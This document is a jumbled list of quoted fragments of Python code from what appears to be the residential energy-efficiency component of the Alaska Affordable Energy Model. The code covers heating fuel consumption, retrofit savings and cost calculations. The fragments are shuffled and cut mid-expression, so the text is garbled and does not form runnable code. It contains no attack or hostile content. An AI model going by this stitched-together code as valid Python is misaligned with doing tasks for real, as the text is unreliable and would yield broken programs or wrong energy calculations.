Occupied'] self.init_HH =", "Affordable Energy Model: This module estimates the potential improvements to heating efficiency of", 
"self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price", "init_gas : float initial natural gas fuel consumption init_LP : float initial propane", "savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set", "consumption, and the forecasted price of offset heating fuels. The cost to retrofit", "Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year)", "not self.was_run: return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel premium'])", "premium']) self.hoil_price = HF_price wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price", "np.nan LP_price = np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF", "Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating", "Oil (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating", "= np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH =", "object forecast : forecast community forecast for estimating future values initial value: forecast", "self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt", "\"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created by", "(gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass 
(cords/year)", "\\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption =", "len(tag) > 1 and tag[1] != 'residential': self.was_run = False self.reason = \"Not", "construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop =", "constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH * \\", "(MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year)", "\"Residential: Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost", "Object for a community forecast : Forecast forecast for a community diagnostics :", "heating cost Attributes ---------- proposed_HF_cost : np.array proposed heating fuel cost \"\"\" HF_price", "tracking error/warning messages prerequisites : dictionary of components, optional prerequisite component data this", "csv in directory Parameters ---------- directory : path output directory \"\"\" if not", "Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential: Net", "Heating Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential:", "calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes ---------- baseline_kWh_cost : np.array baseline cost", "in this component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\", "Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year) 
Consumption Post Retrofit\", \"Residential: Electric", "s_NG_cost = b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) + self.start_year df = DataFrame({", "Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost", "residential buildings (homes). Consumption and savings are based on the number of units", "Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating", "\\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption *", "---------- baseline_kWh_cost : np.array baseline cost of electricity per year \"\"\" self.cd[\"electric prices\"].index", "(kWh/year). >= 6000 \"\"\" # 500 average energy use, 12 months in a", "cordwood consumption savings_gas : float savings in natural gas fuel consumption savings_LP :", "a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]:", "self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption", "* wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec", "= community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average refit", "+\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption for", "* kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel consumption Attributes ----------", "0 
self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords)", "Consumption Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat", "= self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost", "total consumption Parameters ---------- fuel_amnt: float % of fuel used total_consumption : float", "Cost Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total Cost", "self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME", "#~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood", "* HF_price + \\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption * gas_price +", "r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost - r_NG_cost years = np.array(range(self.project_life))", "(SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. 
EUI Reduction\"])", "Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential:", "100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"])", "con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected", "self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption *", "the baseline kWh consumption for a community Attributes ---------- baseline_kWh_consumption : np.array electric", "= str(round(percent_accounted)) + \\ \" of residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg)", "self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH : int", "100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt", "LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption", "'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate =", "Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\": s_elec, \"Residential: Electric Heat", "if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption", "has no prerequisites leave empty Attributes ---------- diagnostics : diagnostics for tracking error/warning", "\\ 
self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~", "Consumption Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil", "Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat", "Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Post", "(total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption Attributes:", "HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt,", "+ \\ \" of residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities", "self.hoil_price = HF_price wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price =", "= self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost -", "df = df[[ \"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year)", "on Diagnostics Object \"\"\" def __init__ (self, community_data, forecast, diag = None, prerequisites", "Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP,", "diagnostics : diagnostics, optional diagnostics for tracking error/warning messages prerequisites : dictionary of", "(gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural", "\\ self.baseline_fuel_kWh_consumption - 
self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas", "general data for a community. Initial value: 'community' section of community_data comp_specs :", "\"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year)", "price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption * wood_price +", "residential buildings HH : float a # of houses cf: float conversion factor", "+\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh)", "= avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"])", "Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost,", "self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\",", "0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative, setting to", "Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\",", "* (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh *", "($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self): 
\"\"\"Set columns", ": diagnostics module, see information on Diagnostics Object \"\"\" def __init__ (self, community_data,", "Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating", "* \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas", "* HF_price + \\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption * gas_price +", "---------- avg_kWh_consumption_per_HH : float average electric consumption per household (kWh/year). >= 6000 \"\"\"", "np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area * EUI # the one in", "- r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost", "(gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating", "= community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast", "b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year)", "Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio,", "initial consumption for each fuel type. 
Attributes ---------- init_HF : float initial heating", "#~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost =", "of project \"\"\" val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop", "HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def run (self, scalers =", "[kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption)", "the average monthly consumption of electricity for a house. Attributes ---------- avg_kWh_consumption_per_HH :", "Heating Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Cost", "self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost = \\", "wood_price + \\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption * LP_price + \\", "elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP =", ": np.array electric savings ($/year) are the difference in the base and proposed", "(MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(),", "prerequisites = {}): \"\"\"Class initialiser Parameters ---------- community_data : CommunityData CommunityData Object for", "(gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass", "All (MMBtu/year) 
Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential:", "self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the component output", "\"Residential: Electric Heat (kWh/year) Consumption Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\":", "int estimated households for first year of project \"\"\" val = self.forecast.get_population(self.start_year) HH", "fuel consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH", "b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP -", "\"Residential: Total Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name']", "and savings are based on the number of units that have not been", "Heating Propane (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential:", "efficiency component of the Alaska Affordable Energy Model: This module estimates the potential", "Oil\"]) / 100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt", "households for the first year of the project Attributes ---------- init_HH : int", "\"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All", "ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs =", "+ str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr)) def calc_init_HH (self): \"\"\"Estimate the", "* \\ self.calc_consumption_by_fuel(amnt, total, 1, 
constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP =", "Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\":", "proposed fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating", ": float total consumption for residential buildings HH : float a # of", "constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy produced. Returns ------- float the total", "* \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood =", "self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption", "\"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\",", "year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \"", ": forecast community forecast for estimating future values initial value: forecast cd :", "\\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def", "Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric", "based on the number of units that have not been retrofit as of", "\\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average monthly consumption of electricity for", "self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) 
self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the component", "* wood_price + \\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption * LP_price +", "self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel saved. Returns ------- float", "per year \"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0]", "Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year)", "500 average energy use, 12 months in a year. That's where the 6000.0", "= b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption *", "Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost", "used total_consumption : float total consumption for residential buildings HH : float a", "consumption \"\"\" rd = self.comp_specs['data'] ## total consumption total = rd[\"Total Consumption (MMBtu)\"]", "= np.nan LP_price = np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil =", "self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood *", "(MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(),", "+\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def", "self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption 
= \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption", "heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]:", "\"Residential: Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\",", "capital costs. Attributes ---------- capital_costs : float total cost of improvements ($) \"\"\"", "* kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital costs. Attributes ---------- capital_costs :", "self.base_pop))) def run (self, scalers = {'capital costs':1.0}): \"\"\"Runs the component. The Annual", "in natural gas fuel consumption savings_LP : float savings in propane consumption savings_kWh", "(1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP)", "Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat", "a type of fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu", "total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt self.init_gas", "Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential:", "self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP", "energy produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ 
self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption", "of the Alaska Affordable Energy Model: This module estimates the potential improvements to", "and tag[1] != 'residential': self.was_run = False self.reason = \"Not a residential project.\"", "s_NG, \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas", "100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~", "Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost", "component. The Annual Total Savings,Annual Costs, Annual Net Benefit, NPV Benefits, NPV Costs,", "class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the Alaska Affordable Energy Model: This", "Oil (gallons/year) Cost Savings\", \"Residential: Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass", "---------- init_HH : int estimated households for first year of project \"\"\" val", "HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"])", "calculated in this component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption)", "#~ self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con): avg_con = con_threshold", "of electricity per year \"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~ kWh_cost", "(cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential:", "Benefits, Benefit-Cost Ratio, Levelized Cost of Energy, and Internal Rate of Return will", "consumption baseline_fuel_LP_consumption : np.array baseline 
propane consumption baseline_fuel_kWh_consumption : np.array baseline electricity consumption", "of offset heating fuels. The cost to retrofit each home is also calculated.", "HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio", "total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH", "can be retrofit savings_HF : float savings in heating oil consumption savings_wood :", "(MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"]", "= \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption =", "messages prerequisites : dictionary of components, optional prerequisite component data \"\"\" self.diagnostics =", "= self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted +=", "float initial propane consumption init_kWh : float initial electric consumption \"\"\" rd =", "self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed", "str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" +", "baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural gas consumption baseline_fuel_LP_consumption : np.array", "HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio =", 
"self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf) def", "\"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH : int Houses that can be retrofit", "= community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0]", "np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH", "empty Attributes ---------- diagnostics : diagnostics for tracking error/warning messages initial value: diag", "cost of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self):", "Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane (gallons/year) Consumption", "Object aaem.diagnostics : diagnostics module, see information on Diagnostics Object \"\"\" def __init__", "\"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential:", "all be calculated. 
There must be a known Heat Recovery project for this", "is None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh per house']", "amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other", "self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel consumption Attributes", "Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption", "avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \" +", "of Energy, and Internal Rate of Return will all be calculated. There must", "= self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other msg =", "+ \\ rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"] *", "Post Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost", "* constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas +", "+ \\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption", "Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec,", "All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\":", "b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = 